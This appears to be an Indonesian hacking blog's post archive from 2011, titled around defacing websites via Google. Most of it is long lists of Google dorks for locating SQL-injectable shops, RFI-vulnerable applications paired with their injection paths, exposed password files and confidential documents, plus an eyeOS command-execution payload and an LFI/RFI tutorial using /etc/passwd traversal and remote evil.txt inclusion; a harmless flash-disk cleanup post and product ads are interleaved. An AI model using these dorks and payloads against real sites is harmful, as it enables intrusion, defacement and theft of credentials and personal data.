Kumpulan Google Dork Untuk SQL Injection (Deface Website Lewat Google)

Posted by Administrator Monday, February 14, 2011, under , | No comments

List Google Dork
By intext:

inurl:".php?id=" intext:"View cart"
inurl:".php?id=" intext:"Buy Now"
inurl:".php?id=" intext:"add to cart"
inurl:".php?id=" intext:"shopping"
inurl:".php?id=" intext:"boutique"
inurl:".php?id=" intext:"/store/"
inurl:".php?id=" intext:"/shop/"
inurl:".php?id=" intext:"toys"

inurl:".php?cid="
inurl:".php?cid=" intext:"shopping"
inurl:".php?cid=" intext:"add to cart"
inurl:".php?cid=" intext:"Buy Now"
inurl:".php?cid=" intext:"View cart"
inurl:".php?cid=" intext:"boutique"
inurl:".php?cid=" intext:"/store/"
inurl:".php?cid=" intext:"/shop/"
inurl:".php?cid=" intext:"Toys"

inurl:".php?cat="
inurl:".php?cat=" intext:"shopping"
inurl:".php?cat=" intext:"add to cart"
inurl:".php?cat=" intext:"Buy Now"
inurl:".php?cat=" intext:"View cart"
inurl:".php?cat=" intext:"boutique"
inurl:".php?cat=" intext:"/store/"
inurl:".php?cat=" intext:"/shop/"
inurl:".php?cat=" intext:"Toys"

inurl:".php?catid="
inurl:".php?catid=" intext:"View cart"
inurl:".php?catid=" intext:"Buy Now"
inurl:".php?catid=" intext:"add to cart"
inurl:".php?catid=" intext:"shopping"
inurl:".php?catid=" intext:"boutique"
inurl:".php?catid=" intext:"/store/"
inurl:".php?catid=" intext:"/shop/"
inurl:".php?catid=" intext:"Toys"

inurl:".php?categoryid="
inurl:".php?categoryid=" intext:"View cart"
inurl:".php?categoryid=" intext:"Buy Now"
inurl:".php?categoryid=" intext:"add to cart"
inurl:".php?categoryid=" intext:"shopping"
inurl:".php?categoryid=" intext:"boutique"
inurl:".php?categoryid=" intext:"/store/"
inurl:".php?categoryid=" intext:"/shop/"
inurl:".php?categoryid=" intext:"Toys"

inurl:".php?pid="
inurl:".php?pid=" intext:"shopping"
inurl:".php?pid=" intext:"add to cart"
inurl:".php?pid=" intext:"Buy Now"
inurl:".php?pid=" intext:"View cart"
inurl:".php?pid=" intext:"boutique"
inurl:".php?pid=" intext:"/store/"
inurl:".php?pid=" intext:"/shop/"
inurl:".php?pid=" intext:"toys"

inurl:".php?prodid=
inurl:".php?prodid=" intext:"shopping"
inurl:".php?prodid=" intext:"add to cart"
inurl:".php?prodid=" intext:"Buy Now"
inurl:".php?prodid=" intext:"View cart"
inurl:".php?prodid=" intext:"boutique"
inurl:".php?prodid=" intext:"/store/"
inurl:".php?prodid=" intext:"/shop/"
inurl:".php?prodid=" intext:"toys"

inurl:".php?productid='
inurl:".php?productid=" intext:"shopping"
inurl:".php?productid=" intext:"add to cart"
inurl:".php?productid=" intext:"Buy Now"
inurl:".php?productid=" intext:"View cart"
inurl:".php?productid=" intext:"boutique"
inurl:".php?productid=" intext:"/store/"
inurl:".php?productid=" intext:"/shop/"
inurl:".php?productid=" intext:"Toys"

inurl:".php?product="
inurl:".php?product=" intext:"shopping"
inurl:".php?product=" intext:"add to cart"
inurl:".php?product=" intext:"Buy Now"
inurl:".php?product=" intext:"View cart"
inurl:".php?product=" intext:"boutique"
inurl:".php?product=" intext:"/store/"
inurl:".php?product=" intext:"/shop/"
inurl:".php?product=" intext:"toys"
inurl:".php?product=" intext:"DVD"

inurl:".php?products="
inurl:".php?products=" intext:"shopping"
inurl:".php?products=" intext:"add to cart"
inurl:".php?products=" intext:"Buy Now"
inurl:".php?products=" intext:"View cart"
inurl:".php?products=" intext:"boutique"
inurl:".php?products=" intext:"/store/"
inurl:".php?products=" intext:"/shop/"
inurl:".php?products=" intext:"toys"
inurl:".php?products=" intext:"DVD"

inurl:".php?proid="
inurl:".php?proid=" intext:"shopping"
inurl:".php?proid=" intext:"add to cart"
inurl:".php?proid=" intext:"Buy Now"
inurl:".php?proid=" intext:"View cart"
inurl:".php?proid=" intext:"boutique"
inurl:".php?proid=" intext:"/store/"
inurl:".php?proid=" intext:"/shop/"
inurl:".php?proid=" intext:"toys"

inurl:".php?shopid="
inurl:".php?shopid=" intext:"shopping"
inurl:".php?shopid=" intext:"add to cart"
inurl:".php?shopid=" intext:"Buy Now"
inurl:".php?shopid=" intext:"View cart"
inurl:".php?shopid=" intext:"boutique"
inurl:".php?shopid=" intext:"/store/"
inurl:".php?shopid=" intext:"/shop/"
inurl:".php?shopid=" intext:"Toys"

inurl:".php?itemid="
inurl:".php?itemid=" intext:"shopping"
inurl:".php?itemid=" intext:"add to cart"
inurl:".php?itemid=" intext:"Buy Now"
inurl:".php?itemid=" intext:"View cart"
inurl:".php?itemid=" intext:"boutique"
inurl:".php?itemid=" intext:"/shop/"
inurl:".php?itemid=" intext:"/store/"
inurl:".php?itemid=" intext:"Toys"

inurl:".php?orderid="
inurl:".php?orderid=" intext:"shopping"
inurl:".php?orderid=" intext:"add to cart"
inurl:".php?orderid=" intext:"Buy Now"
inurl:".php?orderid=" intext:"View cart"
inurl:".php?orderid=" intext:"boutique"
inurl:".php?orderid=" intext:"/shop/"
inurl:".php?orderid=" intext:"/store/"
inurl:".php?orderid=" intext:"Toys"


inurl:".php?catalogId="
inurl:".php?catalogId=" intext:"shopping"
inurl:".php?catalogId=" intext:"add to cart"
inurl:".php?catalogId=" intext:"Buy Now"
inurl:".php?catalogId=" intext:"View cart"
inurl:".php?catalogId=" intext:"boutique"
inurl:".php?catalogId=" intext:"/shop/"
inurl:".php?catalogId=" intext:"/store/"
inurl:".php?catalogId=" intext:"Toys"

inurl:".php?aid="
inurl:".php?aid=" intext:"shopping"
inurl:".php?aid=" intext:"add to cart"
inurl:".php?aid=" intext:"Buy Now"
inurl:".php?aid=" intext:"View cart"
inurl:".php?aid=" intext:"boutique"
inurl:".php?aid=" intext:"/shop/"
inurl:".php?aid=" intext:"/store/"
inurl:".php?aid=" intext:"toys"

inurl:".php?artid="
inurl:".php?artid=" intext:"shopping"
inurl:".php?artid=" intext:"add to cart"
inurl:".php?artid=" intext:"Buy Now"
inurl:".php?artid=" intext:"View cart"
inurl:".php?artid=" intext:"boutique"
inurl:".php?artid=" intext:"/shop/"
inurl:".php?artid=" intext:"/store/"
inurl:".php?artid=" intext:"toys"


inurl:".php?articleid="
inurl:".php?articleid=" intext:"shopping"
inurl:".php?articleid=" intext:"add to cart"
inurl:".php?articleid=" intext:"Buy Now"
inurl:".php?articleid=" intext:"View cart"
inurl:".php?articleid=" intext:"boutique"
inurl:".php?articleid=" intext:"/shop/"
inurl:".php?articleid=" intext:"/store/"
inurl:".php?articleid=" intext:"toys"

###
By State

inurl:".php?id=" site:.uk
inurl:".php?id=" site:.au
inurl:".php?id=" site:.de
inurl:".php?id=" site:.at
inurl:".php?id=" site:.ca
inurl:".php?id=" site:.eu
inurl:".php?id=" site:.us
inurl:".php?id=" site:.fr

inurl:".php?cid=" site:.uk
inurl:".php?cid=" site:.au
inurl:".php?cid=" site:.de
inurl:".php?cid=" site:.at
inurl:".php?cid=" site:.ca
inurl:".php?cid=" site:.eu
inurl:".php?cid=" site:.us
inurl:".php?cid=" site:.fr

inurl:".php?catid=" site:.uk
inurl:".php?catid=" site:.au
inurl:".php?catid=" site:.de
inurl:".php?catid=" site:.at
inurl:".php?catid=" site:.ca
inurl:".php?catid=" site:.eu
inurl:".php?catid=" site:.us
inurl:".php?catid=" site:.fr

inurl:".php?categoryid=" site:.uk
inurl:".php?categoryid=" site:.au
inurl:".php?categoryid=" site:.de
inurl:".php?categoryid=" site:.at
inurl:".php?categoryid=" site:.ca
inurl:".php?categoryid=" site:.eu
inurl:".php?categoryid=" site:.us
inurl:".php?categoryid=" site:.fr

inurl:".php?pid=" site:.uk
inurl:".php?pid=" site:.au
inurl:".php?pid=" site:.de
inurl:".php?pid=" site:.at
inurl:".php?pid=" site:.ca
inurl:".php?pid=" site:.eu
inurl:".php?pid=" site:.us
inurl:".php?pid=" site:.fr

inurl:".php?prodid=" site:.uk
inurl:".php?prodid=" site:.au
inurl:".php?prodid=" site:.de
inurl:".php?prodid=" site:.at
inurl:".php?prodid=" site:.ca
inurl:".php?prodid=" site:.eu
inurl:".php?prodid=" site:.us
inurl:".php?prodid=" site:.fr

inurl:".php?productid=" site:.uk
inurl:".php?productid=" site:.au
inurl:".php?productid=" site:.de
inurl:".php?productid=" site:.at
inurl:".php?productid=" site:.ca
inurl:".php?productid=" site:.eu
inurl:".php?productid=" site:.us
inurl:".php?productid=" site:.fr

inurl:".php?shopid=" site:.uk
inurl:".php?shopid=" site:.ca
inurl:".php?shopid=" site:.at
inurl:".php?shopid=" site:.au
inurl:".php?shopid=" site:.de
inurl:".php?shopid=" site:.eu
inurl:".php?shopid=" site:.us
inurl:".php?shopid=" site:.fr

inurl:".php?itemid=" site:.uk
inurl:".php?itemid=" site:.ca
inurl:".php?itemid=" site:.at
inurl:".php?itemid=" site:.au
inurl:".php?itemid=" site:.de
inurl:".php?itemid=" site:.eu
inurl:".php?itemid=" site:.us
inurl:".php?itemid=" site:.fr

inurl:".php?orderid=" site:.uk
inurl:".php?orderid=" site:.ca
inurl:".php?orderid=" site:.at
inurl:".php?orderid=" site:.au
inurl:".php?orderid=" site:.de
inurl:".php?orderid=" site:.eu
inurl:".php?orderid=" site:.us
inurl:".php?orderid=" site:.fr

inurl:".php?catalogId=" site:.uk
inurl:".php?catalogId=" site:.ca
inurl:".php?catalogId=" site:.at
inurl:".php?catalogId=" site:.au
inurl:".php?catalogId=" site:.de
inurl:".php?catalogId=" site:.eu
inurl:".php?catalogId=" site:.us
inurl:".php?catalogId=" site:.fr

inurl:".php?aid=" site:.uk
inurl:".php?aid=" site:.ca
inurl:".php?aid=" site:.at
inurl:".php?aid=" site:.au
inurl:".php?aid=" site:.de
inurl:".php?aid=" site:.eu
inurl:".php?aid=" site:.us
inurl:".php?aid=" site:.fr

inurl:".php?artid=" site:.uk
inurl:".php?artid=" site:.ca
inurl:".php?artid=" site:.at
inurl:".php?artid=" site:.au
inurl:".php?artid=" site:.de
inurl:".php?artid=" site:.eu
inurl:".php?artid=" site:.us
inurl:".php?artid=" site:.fr

inurl:".php?articleid=" site:.uk
inurl:".php?articleid=" site:.ca
inurl:".php?articleid=" site:.at
inurl:".php?articleid=" site:.au
inurl:".php?articleid=" site:.de
inurl:".php?articleid=" site:.eu
inurl:".php?articleid=" site:.us
inurl:".php?articleid=" site:.fr


Kindle Wireless Reading Device, Wi-Fi, Graphite, 6" Display with New E Ink Pearl Technology 

Google Dork ( RFI )

Posted by Administrator Friday, February 11, 2011, under ,, | No comments

The Google Way: How One Company Is Revolutionizing Management as We Know It 
=========================================================
dork: "powered by doodle cart"
rfi of this dork: enc/content.php?Home_Path=

dork: "Login to Calendar"
rfi of this dork: /embed/day.php?path=

dork: "powered by EQdkp"
rfi of this dork: /includes/dbal.php?eqdkp_root_path=

dork: inurl:surveys
rfi to this dork: /surveys/survey.inc.php?path=

dork: allinurl:adobt sitel
rfi to this dork: /classes/adodbt/sql.php?classes_dir=

dork: "Powered By ScozNews"
rfi to this dork: /sources/functions.php?CONFIG[main_path]=
rfi to this dork: /sources/template.php?CONFIG[main_path]=

dork: allinurl:"mcf.php"
rfi to this dork: /mcf.php?content=

dork: inurl:"main.php?sayfa="
rfi to this dork: /main.php?sayfa=

dork: "MobilePublisherPHP"
rfi to this dork: /header.php?abspath=

dork: "powered by phpCOIN 1.2.3"
rfi to rhis dork: /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=

=====================================================================

1. allinurl:my_egallery site:.org
/modules/My_eGallery/public/displayCategory.php?basepath=

2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

3. allinurl:coppermine site:.org
/modules/coppermine/themes/default/theme.php?THEME_DIR=

4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=

5. allinurlP:NphpBB2 site:.org
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

6. allinurl:ihm.php?p=

7. Keyword : "powered by AllMyLinks"
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

8. allinurl:/modules.php?name=allmyguests
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

9. allinurl:/Popper/index.php?
/Popper/index.php?childwindow.inc.php?form=

10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
yahoo = by Kietu? v 3.2
/kietu/index.php?kietu[url_hit]=

11. keyword : "Powered by phpBB 2.0.6"
/html&highlight=%2527.include($_GET[a]),exit.%2527&a=

12. keyword : "powered by CubeCart 3.0.6"
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

13. keyword : "powered by paBugs 2.0 Beta 3"
/class.mysql.php?path_to_bt_dir=

14. allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php
/ashnews.php?pathtoashnews=

15. keyword : /phorum/login.php
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

16. allinurl:ihm.php?p=*

14. keyword : "powered eyeOs"
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&a=

15. allinurl:.php?bodyfile=

16. allinurl:/includes/orderSuccess.inc.php?glob=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

17. allinurl:forums.html
/modules.php?name=

18. allinurl:/default.php?page=home

19. allinurl:/folder.php?id=

20. allinurl:main.php?pagina=
/paginedinamiche/main.php?pagina=

21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests")
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

22. allinurl:application.php?base_path=
/application.php?base_path=

23. allinurl:phplivehelper
/phplivehelper/initiate.php?abs_path=

24. allinurl:phpnuke
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

25. key word : "powered by Fantastic News v2.1.2"
/archive.php?CONFIG[script_path]=

26. keyword: "powered by smartblog" AND inurl:?page=login
/index.php?page=

27. allinurl:/forum/
/forum/admin/index.php?inc_conf=

28. keyword:"Powered By FusionPHP"
/templates/headline_temp.php?nst_inc=

29. allinurl:shoutbox/expanded.php filetypep:hp
/shoutbox/expanded.php?conf=

30. allinurl: /osticket/
/osticket/include/main.php?config[search_disp]=true&include_dir=

31. keyword : "Powered by iUser"
/common.php?include_path=

32. allinurl: "static.php?load="
/static.php?load=

33. keyworld : /phpcoin/login.php
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

34. keyworld: allinurl:/phpGedview/login.php site:
/help_text_vars.php?dir&PGV_BASE_DIRECTORY=

35. allinurl:/folder.php?id=
/classes.php?LOCAL_PATH=

Eliminate Viruses and Restore Data in Flash Disk

Posted by Administrator Thursday, February 10, 2011, under , | No comments

Kingston DataTraveler I - 4 GB USB 2.0 Flash Drive DTI/4GB 

Menghilangkan Virus dan Mengembalikan Data di Flash Disk

Makin
meningkatnya penggunaan flash disk, membuat pembuat virus mengalihkan
sasarannya ke media penyimpanan yang simple tersebut, bukan hanya
menanamkan virus tetapi juga efek yang dihasilkan beraneka ragam, salah
satunya isi yang ada di flash disk, seperti file atau folder
disembunyikan (Hidden). Gimana cara menanggulangi kasus tersebut? ,
coba ikuti langkah-langkah di bawah ini.

Menghilangkan virus

Langkah Pertama

1. Pastikan antivirus terupdate

2. Masukkan flash disk ke PC atau Laptop

3. Jangan membuka kotak dialog yang muncul ketika flash disk dimasukkan ke PC atau laptop.

Langkah kedua

1. Buka windows Explorer atau My Computer

2. Klik kanan mouse di posisi drive flash disk, biasanya F:

3. Kemudian pilih scan virus sesuai anti virus yang digunakan (“ingat”, biasakan antivirus terupdate)


Mengembalikan data

Setelah
virus benar-benar hilang dari flash disk, sekarang saatnya
mengembalikan data yang disembunyikan (Hidden). Berikut
langkah-langkahnya:



1.Buka Command Prompt, bisa dengan cara klik Start – Run- ketik cmd atau command (untuk Windows 98/ME).

2.Setelah
terbuka jendela command prompt, kemudian ketik attrib -h -r -s -a /s /d
f: (dengan catatan berada di drive C, sebagai contoh; C:\Documents and
Settings\Papa> attrib -h -r -s -a /s /d f: )

3.Lalu setelah perintah tersebut diketikkan, kemudian enter.

4.Apabila
langkah no.2 tidak berhasil, anda pindahkan posisinya dari drive C ke
drive flash disk (biasanya F), untuk memindahkan posisi drive, ikuti
langkah berikut, apabila posisi flash disk di komputer atau laptop ada
di drive F, maka (sebagai contoh); C:\Documents and Settings\Papa>
F: kemudian enter maka akan pindah ke drive F:\>

5.Setelah
berada di posisi drive flash disk kemudian ketik perintah yang sama
dengan langkah no.2, namun untuk f: yang berada di belakang
dihilangkan, sebagai contoh : F:\> attrib -h -r -s -a /s /d ,
kemudian enter.

6.Sesudah proses tersebut, sekarang coba cek folder atau file yang ada di flash disk.

Moga bisa bermanfaat....

Dangerous tools from Google

Posted by Administrator Thursday, February 10, 2011, under | No comments

Diam diam, site ini memberikan kita tools untuk melakukan hacking yang
paling berbahaya se antero dunia, walaupun tools google ini hanya bisa
memberikan sampai ke level footprinting ada juga yang bisa sampai ke
level selanjutnya. kenapa aku sebut dengan tools ? karna kita
menggunakan google untuk mencari media yang unsecure, yang mudah di
hack yang bolong, yang belum ter update, karna google memiliki kekuatan
untuk itu semua.

dari tutorial ini yang akan didapatkan adalah:

* Bagaimana cara menggunakan google untuk mencari sources dari personal information dan confidential data lainya
* Bagaimana cara mencari informasi tentang vulnerable systems and Web services
* Bagaimana cara mencari publicly available network devices.


Hal pertama dari yang harus di ketahui adalah Google Query Operators
Query
operator ini berfungsi kasar sebagai filtering search nya google
menjadi lebih spesifik berdasarkan query yang kita inginkan, masing
masing query memiliki fungsi sendiri sendiri. berikut keterangan dan
contong nya….

site
memfilter berdasarkan domain yang ada
contoh: site:google.com fox —> akan mencari kata fox di situs google.com

intitle
Memfilter dokumen yang memiliki title yang spesifik
contoh: intitle:fox fire —> akan mencari semua site yang ada kata fox dan didalamnya terdapat teks fire

allintitle
Memfilter dokumen untuk mencari intitle intile
contoh:
allintitle:fox fire —> akan mencari semua site yang memiliki title
fox dan yang memiliki title fire atau = intitle:fox intitle:fire

inurl
Memfilter pencarian dengan url yang spesifik
contoh: inurl:fox fire —> akan mencari kata fire di website yang url nya terdapat fox

allinurl
Sama dengan Allintitle (hanya ini url)

filetype, ext
Memfilter pencarian untuk dokumen yang spesifik
contoh: filetype:pdf fire —> akan mencari file PDF yang didalamnya terdapat kata fire

contoh keren: filetype:doc skripsi IT

numrange
Memfilter dokumen berdasarkan range tertentu
contoh: numrange:1-100 fire —> akan mencari range 1-100 yang terdapat kata fire

link
Memfilter site site yang memiliki link terhadap site tertentu
contoh: link:www.google.com —> akan mencari site site mana aja yang memiliki links ke google.com

inanchor
Memfilter berdasarkan site description yang ada
contoh: inanchor:fire —> akan mencari web yang memiliki deskripsi fire

kira kira itulah query query google yang keren keren, sisanya ada sih, seperti:
/ * - + “” ( ya ini regular ekspression biasa kan, jadi ngga perlu di jelaskan lebih detail )

nah,
dari situ, kia bisa kreasikan ke berbagai macam jenis query untuk
memfilter sesuatu, bahkan ke sesuatu yang lebih dalam, misalnya file
database……

Web Server
untuk mencari target dengan mudah dilakukan google dengan menggunakan sintaks berikut ini:
“Apache/1.3.28 Server at” intitle:index.of
–> Apache 1.3.28

“Apache/2.0 Server at” intitle:index.of
–> Apache 2.0

“Apache/* Server at” intitle:index.of
–> semua versi dari Apache

“Microsoft-IIS/4.0 Server at” intitle:index.of
–> Microsoft Internet Information Services 4.0

“Microsoft-IIS/5.0 Server at” intitle:index.of
–> Microsoft Internet Information Services 5.0

“Microsoft-IIS/6.0 Server at” intitle:index.of
–> Microsoft Internet Information Services 6.0

“Microsoft-IIS/* Server at” intitle:index.of
–> semua versi dari Microsoft Internet Information Services

“Oracle HTTP Server/* Server at” intitle:index.of
–> semua versi dari Oracle HTTP Server

“IBM _ HTTP _ Server/* * Server at” intitle:index.of
–> semua versi dari IBM HTTP Server

“Netscape/* Server at” intitle:index.of
–> semua versi dari Netscape Server

“Red Hat Secure/*” intitle:index.of
–> semua versi dari the Red Hat Secure server

“HP Apache-based Web Server/*” intitle:index.of
–> semua versi dari the HP server

Beberapa Bug pada Skripts dapat ditemukan google:
“Generated by phpSystem”
–>
dapat menemukan operating system type and version, hardware
configuration, logged users, open connections, free memory dan disk
space, mount points

“This summary was generated by wwwstat”
–> web server statistics, system file structure

“These statistics were produced by getstats”
–>web server statistics, system file structure

“This report was generated by WebLog”
–>web server statistics, system file structure

intext:”Tobias Oetiker” “traffic analysis”
–>system performance statistics as MRTG charts, network configuration

intitle:”Apache::Status” (inurl:server-status | inurl:status.html | inurl:apache.html)
–>server version, operating system type, child process list,current connections

intitle:”ASP Stats Generator *.*” “
–>ASP Stats

Generator” “2003-2004 weppos”
–>web server activity, lots of visitor information

intitle:”Multimon UPS status page”
–>UPS device performance statistics

intitle:”statistics of” “advanced web statistics”
–>web server statistics, visitor information

intitle:”System Statistics” +”System and Network Information Center”
–>system performance statistics as MRTG charts, hardware configuration, running services

intitle:”Usage Statistics for” “Generated by Webalizer”
–>web server statistics, visitor information, system file structure

intitle:”Web Server Statistics for ****”
–>web server statistics, visitor information

inurl:”/axs/ax-admin.pl” -script
–>web server statistics, visitor information

inurl:”/cricket/grapher.cgi”
–>MRTG charts of network interface performance

inurl:server-info “Apache Server Information”
–>web server version and configuration, operating system type, system file structure

“Output produced by SysWatch *”
–>operating system type and version, logged users, free memory and disk space, mount points, running processes,system logs

Error message queries
Salah satu kumpulan error message query, dapat ditemukan sehingga kita bisa mulai melakukan hacking pada tahap selanjutnya.

“A syntax error has occurred” filetype:ihtml
–>Informix
database errors, berpotensial untuk mengambil function names,
filenames, file structure information, pieces of SQL code and passwords

“Access denied for user” “Using password”
–>authorisation
errors, berpotensial untuk mengambil user names, function names, file
structure information and pieces of SQL code

“The script whose uid is ” “is not allowed to access”
–>access-related PHP errors, berpotensial untuk mengambil filenames, function names and file structure information

“ORA-00921: unexpected end of SQL command”
–>Oracle database errors, berpotensial untuk mengambil filenames, function names and file structure information

“error found handling the request” cocoon filetype:xml
–>Cocoon
errors, berpotensial untuk mengambil Cocoon version information,
filenames, function names and file structure information

“Invision Power Board Database Error”
–>Invision
Power Board bulletin board errors, berpotensial untuk mengambil
function names, filenames, file structure information and piece of SQL
code

“Warning: mysql _ query()” “invalid query”
–>MySQL database errors, berpotensial untuk mengambil user names, function names, filenames and file structure information

“Error Message : Error loading required libraries.”
–>CGI
script errors, berpotensial untuk mengambil information about operating
system and program versions, user names, filenames and file structure
information

“#mysql dump” filetype:sql
–>MySQL database errors, berpotensial untuk mengambil informasi database structure dan contents

Google queries untuk mencari lokasi passwords
kumpulan secara garis besar lokasi password sebuah sistem yang dapat diakses oleh google

“http://*:*@www”
site passwords for site, stored as the string

“http://username: password@www…” filetype:bak inurl:”htaccess|passwd|shadow|ht users”
file backups, berpotensial untuk mengambil user names and passwords

filetype:mdb inurl:”account|users|admin|administrators|passwd|password”
mdb files, berpotensial untuk mengambil password information

intitle:”Index of” pwd.db
pwd.db files, berpotensial untuk mengambil user names and encrypted passwords

inurl:admin inurl:backup intitle:index.of
directories whose names contain the words admin and backup

“Index of/” “Parent Directory” “WS _ FTP.ini” filetype:ini WS _ FTP PWD
WS_FTP configuration files, berpotensial untuk mengambil FTP server access passwords

ext:pwd inurl:(service|authors|administrators|users) “# -FrontPage-”
Terdapat Microsoft FrontPage passwords

filetype:sql (”passwd values ****” |”password values ****” | “pass values ****” )
Terdapat SQL code and passwords yang disimpan dalam a database

intitle:index.of trillian.ini
configuration files for the Trillian IM

eggdrop filetype:user
user configuration files for the Eggdrop ircbot

filetype:conf slapd.conf configuration files for OpenLDAP

inurl:”wvdial.conf” intext:”password” configuration files for WV Dial

ext:ini eudora.ini configuration files for the Eudora mail client

filetype:mdb inurl:users.mdb
Microsoft Access files, berpotensial untuk mengambil user account information

intext:”powered by Web Wiz Journal”
websites
using Web Wiz Journal, which in its standard configuration allows
access to the passwords file – just enter http:///journal/journal.mdb
instead of the default http:///journal/

“Powered by DUclassified” -site:duware.com
“Powered by DUcalendar” -site:duware.com
“Powered by DUdirectory” -site:duware.com
“Powered by DUclassmate” -site:duware.com
“Powered by DUdownload” -site:duware.com
“Powered by DUpaypal” -site:duware.com
“Powered by DUforum” -site:duware.com
intitle:dupics inurl:(add.asp | default.asp |view.asp | voting.asp) -site:duware.com
websites
yang menggunakan DUclassified, DUcalendar, DUdirectory, DUclassmate,
DUdownload, DUpaypal, DUforum or DUpics applications, secara default
memungkinkan kita untuk mengambil passwords file
– untuk DUclassified, just enter http:///duClassified/ _private/duclassified.mdb
atau http:///duClassified/

intext:”BiTBOARD v2.0? “BiTSHiFTERS Bulletin Board”
website
yang menggunakan Bitboard2 bulletin board, secara default settings
memungkinkan kita untuk mengambil passwords file to be obtained
– dengan cara http:///forum/admin/data _ passwd.dat
atau http:///forum/forum.php

Mencari Dokumen khusus ?
filetype:xls inurl:”email.xls” email.xls
files, berpotensial untuk mengambil contact information

“phone * * *” “address *” “e-mail” intitle:”curriculum vitae”
CVs

“not for distribution”
confidential documents containing the confidential clause

buddylist.blt
AIM contacts list

intitle:index.of mystuff.xml
Trillian IM contacts list

filetype:ctt “msn”
MSN contacts list

filetype:QDF
QDF database files for the Quicken financial application

intitle:index.of finances.xls
finances.xls files, berpotensial untuk mengambil information on bank accounts, financial summaries and credit card numbers

intitle:”Index Of” -inurl:maillog maillog size maillog files, berpotensial untuk mengambil e-mail

“Network Vulnerability Assessment Report”
“Host Vulnerability Summary Report”
filetype:pdf “Assessment Report”
“This file was generated by Nessus”
reports for network security scans, penetration tests etc. On the Net
The King Is Dead

Local File Inclusion (LFI) dan Remote File Inclusion (RFI)

Posted by Administrator Thursday, February 10, 2011, under ,,, | No comments

LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.
RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server.

Fungsi-fungsi yang dapat menyebabkan LFI/RFI:
Kode:
include();
include_once();
require();
require_once();
Dengan syarat pada konfigurasi php di server:
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off
contoh:
misalkan kita punya file index.php dengan content kodenya seperti ini,
Code:

include “../$_GET[imagefile]“;
?>
misal $imagefile=image.php
mungkin di url akan terlihat seperti ini bentuknya
Code:
http://www.[target].com/index.php?imagefile=image.php
maka script ini akan menampilkan halaman image.php.
Disini attacker akan dapat melakukan LFI karena variable imagefile di include begitu saja tanpa menggunakan filter.
Misalnya attacker ingin mengakses file passwd yang ada pada server, maka dia akan mencoba memasukan seperti ini ../../../../../../../../../etc/passwd << dengan jumlah “../” itu tergantung dari kedalaman folder tempat file index.php tersebut.. dengan begitu isi file passwd akan ditampilkan di browser. kita bisa menggunakan metode menebak struktur folder dalam website target.
Tapi seandainya terdapat error seperti di bawah ini:
Warning: main(../../../../../../../../../etc/passwd.php) [function.main]: failed to open stream: No such file or directory in /their/web/root/index.php on line 2
Ternyata pada passwd ditambah dengan extensi “.php” berarti code yang digunakan untuk include adalah seperti ini:
Kode:

include($_GET[imagefile].”.php”);
?>
Untuk dapat mengelabui script tersebut kita bisa menggunakan (dengan syarat magic_quotes_gpc = off) jadi dibelakang /etc/passwd kita tambahkan seperti
http://www.[target].com/index.php?imagefile=../../../../../../../../../etc/passwd
lalu untuk apa ? yaitu untuk menghilangkan karakter apapun setelah passwd.
* ini disebut null injection.
Nah kita sudah menemukan bug LFI pada website target, sekarang kita coba cari bug RFI dengan menambahkan link file remote (dari luar website) pada variable imagefile. misalnya:
http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt
dengan file evil.txt misal berisi “hacked by H4CK3R”
jika ternyata di browser menampilkan kalimat tersebut berarti website tersebut vulner terhadap bug RFI juga.
Pencegahan
Nah sekarang saatnya untuk pencegahan kedua bug tersebut, yaitu
1. Memvalidasi variable.
2. Mengkonfigurasi kembali settingan php pada server website Anda.
allow_url_include = off
allow_url_fopen = off
magic_quotes_gpc = on
3. pada include mungkin bisa ditambahkan “./”
jadinya seperti ini,
Code:
include(“./”$_GET[imagefile].”.php”);
maksudnya dengan seperti itu, saat kita mengakses file dari luar server maka hasilnya akan error karena saat pemrosesan setiap file yang masuk ke variable page akan ditambah ./ di depannya.
http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt
Dengan seperti ini server atau website yang diinject akan mencari file http://www.[remote].com/evil.txt dan pastinya akan menyebabkan server menampilkan error bahwa tidak ditemukannya file tsb.The Hangman's Daughter

Google Dork

Posted by Administrator Wednesday, February 09, 2011, under ,,, | No comments

The Google Story: For Google's 10th Birthday 

Google Advanced Operators

Google mendukung beberapa operator lanjutan, yaitu kata-kata query yang memiliki arti khusus bagi Google. Biasanya operator ini memodifikasi pencarian dalam beberapa cara, atau bahkan memberitahu Google untuk melakukan jenis pencarian yang sama sekali berbeda. Misalnya, "link:" adalah operator khusus, dan kueri [link: www.google.com] tidak melakukan penelusuran normal tetapi menemukan semua halaman web yang memiliki link ke www.google.com.

